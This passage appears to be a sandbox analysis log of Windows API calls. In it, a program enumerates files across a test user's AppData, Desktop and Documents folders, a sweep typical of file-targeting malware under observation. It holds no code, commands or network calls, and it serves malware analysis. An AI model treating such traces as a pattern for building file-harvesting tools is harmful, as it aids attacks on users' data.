cAlternateFileName="IMNZI0~1")) returned 1 [0201.055] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x601b92e0, ftCreationTime.dwHighDateTime=0x1d5e6d5, ftLastAccessTime.dwLowDateTime=0xa3de5fe0, ftLastAccessTime.dwHighDateTime=0x1d5e774, ftLastWriteTime.dwLowDateTime=0xa3de5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e774, nFileSizeHigh=0x0, nFileSizeLow=0x13d82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TR2H0s.mkv", cAlternateFileName="")) returned 1 [0201.055] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x601b92e0, ftCreationTime.dwHighDateTime=0x1d5e6d5, ftLastAccessTime.dwLowDateTime=0xa3de5fe0, ftLastAccessTime.dwHighDateTime=0x1d5e774, ftLastWriteTime.dwLowDateTime=0xa3de5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e774, nFileSizeHigh=0x0, nFileSizeLow=0x13d82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TR2H0s.mkv", cAlternateFileName="")) returned 0 [0201.055] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3520 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67148 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3470 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3208 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b670e0 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67350 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b673b8 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67420 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3890 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67488 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3940 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b674f0 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3998 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67558 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c39f0 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b671b0 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c34c8 | out: hHeap=0x2c0000) returned 1 [0201.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f970 | out: hHeap=0x2c0000) returned 1 [0201.055] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.055] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.056] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0201.056] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0201.056] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.056] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.056] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.056] PathFindFileNameW (pszPath="") returned="" [0201.056] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0201.056] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.056] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0201.056] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0201.056] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0201.056] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0201.056] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.057] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.057] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\") returned="fDly50O\\" [0201.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0201.057] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.057] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.057] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.057] PathFindFileNameW (pszPath="") returned="" [0201.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fa8fbd0, ftCreationTime.dwHighDateTime=0x1d5dedc, ftLastAccessTime.dwLowDateTime=0xb2934790, ftLastAccessTime.dwHighDateTime=0x1d5dc3d, ftLastWriteTime.dwLowDateTime=0xb2934790, ftLastWriteTime.dwHighDateTime=0x1d5dc3d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384650 | out: hHeap=0x2c0000) returned 1 [0201.058] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fa8fbd0, ftCreationTime.dwHighDateTime=0x1d5dedc, ftLastAccessTime.dwLowDateTime=0xb2934790, ftLastAccessTime.dwHighDateTime=0x1d5dc3d, ftLastWriteTime.dwLowDateTime=0xb2934790, ftLastWriteTime.dwHighDateTime=0x1d5dc3d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.058] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a83c0e0, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xaa5de160, ftLastAccessTime.dwHighDateTime=0x1d5d9cd, ftLastWriteTime.dwLowDateTime=0xaa5de160, ftLastWriteTime.dwHighDateTime=0x1d5d9cd, nFileSizeHigh=0x0, nFileSizeLow=0xbebf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3Y-GLSCY.mp3", cAlternateFileName="")) returned 1 [0201.058] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78e41ee0, ftCreationTime.dwHighDateTime=0x1d5d835, ftLastAccessTime.dwLowDateTime=0xbd5293f0, ftLastAccessTime.dwHighDateTime=0x1d5e5b3, ftLastWriteTime.dwLowDateTime=0xbd5293f0, ftLastWriteTime.dwHighDateTime=0x1d5e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x320d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E-78Ddwse5QS5w5.ods", cAlternateFileName="E-78DD~1.ODS")) returned 1 [0201.059] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92cdbd20, ftCreationTime.dwHighDateTime=0x1d5db6e, ftLastAccessTime.dwLowDateTime=0x1c8afa20, ftLastAccessTime.dwHighDateTime=0x1d5e78e, ftLastWriteTime.dwLowDateTime=0x1c8afa20, ftLastWriteTime.dwHighDateTime=0x1d5e78e, nFileSizeHigh=0x0, nFileSizeLow=0x34b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G_wsbMj2tnXma8d.wav", cAlternateFileName="G_WSBM~1.WAV")) returned 1 [0201.059] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63cffd30, ftCreationTime.dwHighDateTime=0x1d5ddb2, ftLastAccessTime.dwLowDateTime=0x5feefed0, ftLastAccessTime.dwHighDateTime=0x1d5d896, ftLastWriteTime.dwLowDateTime=0x5feefed0, ftLastWriteTime.dwHighDateTime=0x1d5d896, nFileSizeHigh=0x0, nFileSizeLow=0xa2a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VROdpB54C9PpCUk8uSl.bmp", cAlternateFileName="VRODPB~1.BMP")) returned 1 [0201.059] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5274c890, ftCreationTime.dwHighDateTime=0x1d5e613, ftLastAccessTime.dwLowDateTime=0x92c43d90, ftLastAccessTime.dwHighDateTime=0x1d5e1cc, ftLastWriteTime.dwLowDateTime=0x92c43d90, ftLastWriteTime.dwHighDateTime=0x1d5e1cc, nFileSizeHigh=0x0, nFileSizeLow=0x10779, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wtOOF2e1.bmp", cAlternateFileName="")) returned 1 [0201.059] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5274c890, ftCreationTime.dwHighDateTime=0x1d5e613, ftLastAccessTime.dwLowDateTime=0x92c43d90, ftLastAccessTime.dwHighDateTime=0x1d5e1cc, ftLastWriteTime.dwLowDateTime=0x92c43d90, ftLastWriteTime.dwHighDateTime=0x1d5e1cc, nFileSizeHigh=0x0, nFileSizeLow=0x10779, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wtOOF2e1.bmp", cAlternateFileName="")) returned 0 [0201.059] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.059] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.060] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\") returned="sZ1h4QiinWnf\\" [0201.060] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0201.060] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.060] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.060] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.060] PathFindFileNameW (pszPath="") returned="" [0201.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72332bd0, ftCreationTime.dwHighDateTime=0x1d5dd86, ftLastAccessTime.dwLowDateTime=0xed2e1d90, ftLastAccessTime.dwHighDateTime=0x1d5e68c, ftLastWriteTime.dwLowDateTime=0xed2e1d90, ftLastWriteTime.dwHighDateTime=0x1d5e68c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66258 | out: hHeap=0x2c0000) returned 1 [0201.060] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72332bd0, ftCreationTime.dwHighDateTime=0x1d5dd86, ftLastAccessTime.dwLowDateTime=0xed2e1d90, ftLastAccessTime.dwHighDateTime=0x1d5e68c, ftLastWriteTime.dwLowDateTime=0xed2e1d90, ftLastWriteTime.dwHighDateTime=0x1d5e68c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.060] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11f646b0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x9aab0d0, ftLastAccessTime.dwHighDateTime=0x1d5e757, ftLastWriteTime.dwLowDateTime=0x9aab0d0, ftLastWriteTime.dwHighDateTime=0x1d5e757, nFileSizeHigh=0x0, nFileSizeLow=0x18bec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d_HC7Wx7GxjYqhQQa.gif", cAlternateFileName="D_HC7W~1.GIF")) returned 1 [0201.060] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda69ebb0, ftCreationTime.dwHighDateTime=0x1d5e6ed, ftLastAccessTime.dwLowDateTime=0xcc7f6a80, ftLastAccessTime.dwHighDateTime=0x1d5e26e, ftLastWriteTime.dwLowDateTime=0xcc7f6a80, ftLastWriteTime.dwHighDateTime=0x1d5e26e, nFileSizeHigh=0x0, nFileSizeLow=0x14db6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FeFVDggLljOT82m.flv", cAlternateFileName="FEFVDG~1.FLV")) returned 1 [0201.060] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda69ebb0, ftCreationTime.dwHighDateTime=0x1d5e6ed, ftLastAccessTime.dwLowDateTime=0xcc7f6a80, ftLastAccessTime.dwHighDateTime=0x1d5e26e, ftLastWriteTime.dwLowDateTime=0xcc7f6a80, ftLastWriteTime.dwHighDateTime=0x1d5e26e, nFileSizeHigh=0x0, nFileSizeLow=0x14db6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FeFVDggLljOT82m.flv", cAlternateFileName="FEFVDG~1.FLV")) returned 0 [0201.060] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66168 | out: hHeap=0x2c0000) returned 1 [0201.060] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.060] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\") returned="zUdwhkJ\\" [0201.060] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0201.060] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.061] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.061] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.061] PathFindFileNameW (pszPath="") returned="" [0201.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zUdwhkJ\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528b3090, ftCreationTime.dwHighDateTime=0x1d5dedd, ftLastAccessTime.dwLowDateTime=0x75fa4430, ftLastAccessTime.dwHighDateTime=0x1d5da8c, ftLastWriteTime.dwLowDateTime=0x75fa4430, ftLastWriteTime.dwHighDateTime=0x1d5da8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384650 | out: hHeap=0x2c0000) returned 1 [0201.062] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528b3090, ftCreationTime.dwHighDateTime=0x1d5dedd, ftLastAccessTime.dwLowDateTime=0x75fa4430, ftLastAccessTime.dwHighDateTime=0x1d5da8c, ftLastWriteTime.dwLowDateTime=0x75fa4430, ftLastWriteTime.dwHighDateTime=0x1d5da8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.062] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21688590, ftCreationTime.dwHighDateTime=0x1d5e4d6, ftLastAccessTime.dwLowDateTime=0xbaaeef80, ftLastAccessTime.dwHighDateTime=0x1d5dcd1, ftLastWriteTime.dwLowDateTime=0xbaaeef80, ftLastWriteTime.dwHighDateTime=0x1d5dcd1, nFileSizeHigh=0x0, nFileSizeLow=0x13bb9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7DIaYrya0lfH8Miq2Up.wav", cAlternateFileName="7DIAYR~1.WAV")) returned 1 [0201.062] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb75e7be0, ftCreationTime.dwHighDateTime=0x1d5dc98, ftLastAccessTime.dwLowDateTime=0x1fcb07a0, ftLastAccessTime.dwHighDateTime=0x1d5e696, ftLastWriteTime.dwLowDateTime=0x1fcb07a0, ftLastWriteTime.dwHighDateTime=0x1d5e696, nFileSizeHigh=0x0, nFileSizeLow=0x13905, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7KMqt8ZHYw9.bmp", cAlternateFileName="7KMQT8~1.BMP")) returned 1 [0201.062] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf34cdf60, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xec5871e0, ftLastAccessTime.dwHighDateTime=0x1d5e47a, ftLastWriteTime.dwLowDateTime=0xec5871e0, ftLastWriteTime.dwHighDateTime=0x1d5e47a, nFileSizeHigh=0x0, nFileSizeLow=0x5488, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nX515fp0xXoAeKg.mp3", cAlternateFileName="NX515F~1.MP3")) returned 1 [0201.062] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfe97ba0, ftCreationTime.dwHighDateTime=0x1d5e7e7, ftLastAccessTime.dwLowDateTime=0x5ad73c40, ftLastAccessTime.dwHighDateTime=0x1d5dd8d, ftLastWriteTime.dwLowDateTime=0x5ad73c40, ftLastWriteTime.dwHighDateTime=0x1d5dd8d, nFileSizeHigh=0x0, nFileSizeLow=0xd912, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TYK11thUT8O9w.docx", cAlternateFileName="TYK11T~1.DOC")) returned 1 [0201.062] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc59df980, ftCreationTime.dwHighDateTime=0x1d5e349, ftLastAccessTime.dwLowDateTime=0xbd8fc9d0, ftLastAccessTime.dwHighDateTime=0x1d5e54c, ftLastWriteTime.dwLowDateTime=0xbd8fc9d0, ftLastWriteTime.dwHighDateTime=0x1d5e54c, nFileSizeHigh=0x0, nFileSizeLow=0xef26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ydu yo7COcjyeZRwa.ppt", cAlternateFileName="YDUYO7~1.PPT")) returned 1 [0201.062] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc59df980, ftCreationTime.dwHighDateTime=0x1d5e349, ftLastAccessTime.dwLowDateTime=0xbd8fc9d0, ftLastAccessTime.dwHighDateTime=0x1d5e54c, ftLastWriteTime.dwLowDateTime=0xbd8fc9d0, ftLastWriteTime.dwHighDateTime=0x1d5e54c, nFileSizeHigh=0x0, nFileSizeLow=0xef26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ydu yo7COcjyeZRwa.ppt", cAlternateFileName="YDUYO7~1.PPT")) returned 0 [0201.062] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.063] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.063] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\") returned="fZpil8Uu6QzTlWoWB\\" [0201.063] PathFindFileNameW 